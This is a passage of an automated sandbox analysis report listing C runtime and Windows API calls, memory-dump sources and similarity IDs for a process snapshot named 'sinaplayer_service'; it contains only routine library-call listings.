                                                                                                                                                                                                    • _errno.MSVCR120(?,?,6D0AFA11,?,?,?,?,?,?,?,6D0AFA30,0000000C), ref: 6D0D5699
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,6D0AFA11,?,?,?,?,?,?,?,6D0AFA30,0000000C), ref: 6D0D56A4
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D57D9
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_lseek$_fileno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 904722208-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000003,00000000,00000004,?,?,?,6D0A0F30,00000000,00000000,00000000), ref: 6D0A0D9F
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,?,6D0A0F30,00000000,00000000,00000000,00000000,?,?), ref: 6D0A0E14
                                                                                                                                                                                                    • __crtLCMapStringEx.MSVCR120(?,?,00000000,?,00000000,00000000,?,?,?,6D0A0F30,00000000,00000000,00000000,00000000,?,?), ref: 6D0A0E31
                                                                                                                                                                                                    • __crtLCMapStringEx.MSVCR120(?,00000400,00000000,?,?,00000000,?,?), ref: 6D0A0EAD
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?), ref: 6D0A0ED2
                                                                                                                                                                                                    • _freea_s.MSVCR120(?,?,?,?,?,?,?,?,?), ref: 6D0A0EDB
                                                                                                                                                                                                    • _freea_s.MSVCR120(00000000,?,?,?,6D0A0F30,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 6D0A0EE2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide$String__crt_freea_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2471089800-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D10BA27
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D10BA31
                                                                                                                                                                                                    • strcat_s.MSVCR120(?,?,00000000,?), ref: 6D10BA59
                                                                                                                                                                                                    • _errno.MSVCR120(?), ref: 6D10BA7E
                                                                                                                                                                                                    • _ismbblead_l.MSVCR120(?,?,?), ref: 6D10BAA3
                                                                                                                                                                                                    • _ismbblead_l.MSVCR120(?,?,?), ref: 6D10BAFE
                                                                                                                                                                                                    • _errno.MSVCR120(?), ref: 6D10BB1F
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?), ref: 6D10BB29
                                                                                                                                                                                                    • _ismbblead_l.MSVCR120(?,?,?), ref: 6D10BB44
                                                                                                                                                                                                    • _errno.MSVCR120(?), ref: 6D10BB6D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_ismbblead_l$_invalid_parameter_noinfo$strcat_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2457174781-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,?,?,?,?,?,00000000,?,?), ref: 6D092E94
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 626452242-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,?,00000000,?,?), ref: 6D09437E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 626452242-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000), ref: 6D0FA1E1
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0FA217
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EncodeErrorLastPointer
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 688273888-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?wait@_Condition_variable@details@Concurrency@@QAEXAAVcritical_section@3@@Z.MSVCR120(?,E18D5491), ref: 6D0EB56A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ?wait@_Concurrency@@Condition_variable@details@Vcritical_section@3@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3496979797-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                     • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                     • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                     • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                     • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                     • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2819658684-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __p__iob.MSVCR120(6D0A0850,00000010), ref: 6D0A07D5
                                                                                                                                                                                                      • Part of subcall function 6D0942FC: _lock.MSVCR120(?,?,6D095810,00000000,005C7910,6D0958A0,00000010,6D09639E,6D0963D0,00000008), ref: 6D09430F
                                                                                                                                                                                                    • __p__iob.MSVCR120(6D0A0850,00000010), ref: 6D0A07EB
                                                                                                                                                                                                      • Part of subcall function 6D0A0477: _fileno.MSVCR120(?,?,?,6D0A07F9,-00000020,6D0A0850,00000010), ref: 6D0A047F
                                                                                                                                                                                                      • Part of subcall function 6D0A0477: _isatty.MSVCR120(00000000,?,?,?,6D0A07F9,-00000020,6D0A0850,00000010), ref: 6D0A0485
                                                                                                                                                                                                      • Part of subcall function 6D0A0477: __p__iob.MSVCR120(0000FFFF,?,?,6D0A07F9,-00000020,6D0A0850,00000010), ref: 6D0A0491
                                                                                                                                                                                                      • Part of subcall function 6D0A0477: __p__iob.MSVCR120(0000FFFF,?,?,6D0A07F9,-00000020,6D0A0850,00000010), ref: 6D0A04A1
                                                                                                                                                                                                    • __p__iob.MSVCR120(6D0A0850,00000010), ref: 6D0A080D
                                                                                                                                                                                                    • _fputwc_nolock.MSVCR120(-00000020,-00000020,6D0A0850,00000010), ref: 6D0A0817
                                                                                                                                                                                                    • __p__iob.MSVCR120(6D0A0850,00000010), ref: 6D0A0823
                                                                                                                                                                                                    • __ftbuf.LIBCMT ref: 6D0A082F
                                                                                                                                                                                                    • __p__iob.MSVCR120(6D0A0850,00000010), ref: 6D0A086C
                                                                                                                                                                                                    • _fputwc_nolock.MSVCR120(0000000A,-00000020,6D0A0850,00000010), ref: 6D0A0877
                                                                                                                                                                                                    • _errno.MSVCR120(6D0A0850,00000010), ref: 6D0D58B3
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D0A0850,00000010), ref: 6D0D58BE
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                     • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                     • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                     • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                     • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                     • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __p__iob$_fputwc_nolock$__ftbuf_errno_fileno_invalid_parameter_noinfo_isatty_lock
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 120561791-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • HeapReAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,?,6D09FF84,?,00000001,00000000,00000000,?,6D0DF128,00000000,00000010), ref: 6D0922AA
                                                                                                                                                                                                    • malloc.MSVCR120(00000001,?,6D09FF84,?,00000001,00000000,00000000,?,6D0DF128,00000000,00000010,?,?,?,?,6D0ABE8C), ref: 6D09F47B
                                                                                                                                                                                                    • free.MSVCR120(00000000,00000000,?,6D09FF84,?,00000001,00000000,00000000,?,6D0DF128,00000000,00000010), ref: 6D0DDBCB
                                                                                                                                                                                                    • _callnewh.MSVCR120(00000001,?,6D09FF84,?,00000001,00000000,00000000,?,6D0DF128,00000000,00000010,?,?,?,?,6D0ABE8C), ref: 6D0DDBE7
                                                                                                                                                                                                    • _callnewh.MSVCR120(00000001,00000000,00000000,?,6D09FF84,?,00000001,00000000,00000000,?,6D0DF128,00000000,00000010), ref: 6D0DDBF8
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000000,?,6D09FF84,?,00000001,00000000,00000000,?,6D0DF128,00000000,00000010), ref: 6D0DDBFE
                                                                                                                                                                                                    • _errno.MSVCR120(?,6D09FF84,?,00000001,00000000,00000000,?,6D0DF128,00000000,00000010,?,?,?,?,6D0ABE8C,?), ref: 6D0DDC10
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D09FF84,?,00000001,00000000,00000000,?,6D0DF128,00000000,00000010,?,?,?,?,6D0ABE8C,?), ref: 6D0DDC17
                                                                                                                                                                                                    • _errno.MSVCR120(?,6D09FF84,?,00000001,00000000,00000000,?,6D0DF128,00000000,00000010,?,?,?,?,6D0ABE8C,?), ref: 6D0DDC28
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D09FF84,?,00000001,00000000,00000000,?,6D0DF128,00000000,00000010,?,?,?,?,6D0ABE8C,?), ref: 6D0DDC2F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                     • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                     • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                     • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                     • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                     • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$ErrorLast_callnewh$AllocHeapfreemalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2627451454-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D08F764: _getptd.MSVCR120(00000001,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D08F77A
                                                                                                                                                                                                    • __crtCompareStringA.MSVCR120(?,?,00001001,005C2D90,?,?,?,00000000,00000000,?,7FFFFFFF,00000000,?, *\,005C2D90,005C2A20), ref: 6D096FAF
                                                                                                                                                                                                    • _strnicmp_l.MSVCR120(005C2D90,?,?,?,00000000,?,7FFFFFFF,00000000,?, *\,005C2D90,005C2A20,00000000,005C2D90,00000000,00000000), ref: 6D0AE3F6
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,7FFFFFFF,00000000,?, *\,005C2D90,005C2A20,00000000,005C2D90,00000000,00000000,00000000), ref: 6D0DAB98
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,?,7FFFFFFF,00000000,?, *\,005C2D90,005C2A20,00000000,005C2D90,00000000,00000000,00000000), ref: 6D0DABA3
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,7FFFFFFF,00000000,?, *\,005C2D90,005C2A20,00000000,005C2D90,00000000,00000000,00000000), ref: 6D0DABB2
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,?,7FFFFFFF,00000000,?, *\,005C2D90,005C2A20,00000000,005C2D90,00000000,00000000,00000000), ref: 6D0DABBD
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,00000000,?,7FFFFFFF,00000000,?, *\,005C2D90,005C2A20,00000000,005C2D90,00000000,00000000), ref: 6D0DABC7
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                     • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                     • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                     • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                     • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                     • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo$CompareString__crt_getptd_strnicmp_l
                                                                                                                                                                                                    • String ID: *\
                                                                                                                                                                                                    • API String ID: 535387727-3401207301
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _get_osfhandle.MSVCR120(?,?,?,?,6D094F10,?,6D094F30,00000010), ref: 6D094DFA
                                                                                                                                                                                                    • _get_osfhandle.MSVCR120(?), ref: 6D094E1D
                                                                                                                                                                                                      • Part of subcall function 6D094D4B: __doserrno.MSVCR120(?,6D097FEE,00000000,00000000,00000000,00000000,00000000,?,6D0DE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6D094D84
                                                                                                                                                                                                      • Part of subcall function 6D094D4B: _errno.MSVCR120(?,6D097FEE,00000000,00000000,00000000,00000000,00000000,?,6D0DE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6D0DEFE6
                                                                                                                                                                                                      • Part of subcall function 6D094D4B: _invalid_parameter_noinfo.MSVCR120(?,6D097FEE,00000000,00000000,00000000,00000000,00000000,?,6D0DE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6D0DEFF1
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 6D094E24
                                                                                                                                                                                                    • _get_osfhandle.MSVCR120(00000002), ref: 6D0B2A17
                                                                                                                                                                                                    • _get_osfhandle.MSVCR120(00000001,00000002), ref: 6D0B2A20
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0DE211
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _get_osfhandle$CloseErrorHandleLast__doserrno_errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID: l\
                                                                                                                                                                                                    • API String ID: 1012986785-1336192488
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(?,00000000,?), ref: 6D0AC7A0
                                                                                                                                                                                                      • Part of subcall function 6D092226: malloc.MSVCR120(6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D092237
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,00000001,00000000), ref: 6D0D3A67
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,00000000), ref: 6D0D3A88
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0E176C,6D15CE18,?), ref: 6D0D3A9D
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,00000001), ref: 6D0D3AB3
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0E176C,6D15CE18,?), ref: 6D0D3AE9
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D0D3AF0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • _DebugMallocator<T>::allocate() - Integer overflow., xrefs: 6D0D3A7D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: std::exception::exception$ExceptionThrow$_malloc_crtfreemalloc
                                                                                                                                                                                                    • String ID: _DebugMallocator<T>::allocate() - Integer overflow.
                                                                                                                                                                                                    • API String ID: 2405410681-3293063709
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _isleadbyte_lfree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3852065960-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _get_daylight.MSVCR120(?,-FFFFF894,00000006,?,6D095BD6,00000000,6D095BF0,0000000C,6D096173,?,00000000,?,0000003C,00000000,00000000), ref: 6D095C1A
                                                                                                                                                                                                    • __timezone.MSVCR120 ref: 6D0A8EE3
                                                                                                                                                                                                    • __daylight.MSVCR120 ref: 6D0A8EED
                                                                                                                                                                                                    • __dstbias.MSVCR120 ref: 6D0A8EF7
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000,-FFFFF894,00000006,?,6D095BD6,00000000,6D095BF0,0000000C,6D096173,?,00000000), ref: 6D0D668C
                                                                                                                                                                                                    • strcmp.MSVCR120(00000000,00000000,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0D66A5
                                                                                                                                                                                                    • free.MSVCR120(00000000,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0D66BA
                                                                                                                                                                                                    • strlen.MSVCR120(00000000,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0D66C1
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000001,00000000,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0D66C8
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
